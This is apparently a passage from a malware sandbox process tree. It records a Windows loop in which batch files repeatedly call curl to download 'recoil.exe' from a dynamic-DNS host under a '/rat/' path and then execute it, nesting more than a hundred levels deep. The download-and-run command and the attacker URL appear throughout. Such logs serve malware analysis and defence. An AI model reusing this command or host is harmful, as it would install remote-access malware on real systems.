C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe93⤵PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe93⤵PID:2660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A74C.tmp\test.bat""94⤵PID:1900
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe95⤵PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe95⤵PID:2636
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A921.tmp\test.bat""96⤵PID:3276
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe97⤵PID:1008
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe97⤵PID:248
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AAE6.tmp\test.bat""98⤵PID:2356
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe99⤵PID:3456
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe99⤵PID:844
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AC9B.tmp\test.bat""100⤵PID:2712
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe101⤵PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe101⤵PID:4932
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AE22.tmp\test.bat""102⤵PID:5036
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe103⤵PID:4496
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe103⤵PID:4576
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AFD7.tmp\test.bat""104⤵PID:1232
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe105⤵PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe105⤵PID:3252
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B18D.tmp\test.bat""106⤵PID:2888
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe107⤵PID:4916
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe107⤵PID:1956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B342.tmp\test.bat""108⤵PID:2080
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe109⤵PID:660
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe109⤵PID:4164
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B4F8.tmp\test.bat""110⤵PID:1892
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe111⤵PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe111⤵PID:3344
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B68E.tmp\test.bat""112⤵PID:1576
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe113⤵PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe113⤵PID:1588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B863.tmp\test.bat""114⤵PID:5016
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe115⤵PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe115⤵PID:1848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BA18.tmp\test.bat""116⤵PID:1912
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe117⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe117⤵PID:4912
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BBDE.tmp\test.bat""118⤵PID:3780
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe119⤵PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe119⤵PID:4748
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BD64.tmp\test.bat""120⤵PID:3436
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe121⤵PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe121⤵PID:424
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BF29.tmp\test.bat""122⤵PID:1924
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-